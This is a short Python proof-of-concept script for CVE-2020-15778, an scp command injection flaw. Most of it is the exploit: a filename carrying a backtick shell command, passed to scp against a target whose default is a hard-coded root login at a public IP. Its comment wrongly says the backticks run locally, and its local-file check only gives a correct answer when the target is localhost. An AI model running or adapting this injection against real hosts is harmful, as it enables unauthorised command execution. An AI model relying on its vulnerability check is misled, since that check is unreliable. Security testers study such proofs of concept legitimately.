import os
import subprocess
import tempfile


def test_cve_2020_15778(remote_host="root@89.149.226.158"):
    """
    Proof-of-concept test for CVE-2020-15778 (scp command injection).
    WARNING: Do not use against systems you do not own/permissioned.
    """

    # Payload: inject a command using backticks
    malicious_filename = "`touch /tmp/cve2020-15778_poc`file.txt"

    # Create a temporary local file to scp
    tmp_file = tempfile.NamedTemporaryFile(delete=False)
    tmp_file.write(b"POC test file for CVE-2020-15778\n")
    tmp_file.close()

    print(f"[+] Testing SCP injection with malicious filename: {malicious_filename}")

    try:
        # Run scp command - it will interpret the backticks locally
        cmd = ["scp", tmp_file.name, f"{remote_host}:{malicious_filename}"]
        subprocess.run(cmd, check=False)

        # Check if payload executed
        if os.path.exists("/tmp/cve2020-15778_poc"):
            print("[!] Vulnerable: Command injection executed (file created).")
        else:
            print("[+] Safe: Injection did not execute.")
    finally:
        os.unlink(tmp_file.name)
        if os.path.exists("/tmp/cve2020-15778_poc"):
            os.unlink("/tmp/cve2020-15778_poc")


if __name__ == "__main__":
    # Change user@host if needed (must be a host you can SSH into)
    test_cve_2020_15778("user@localhost")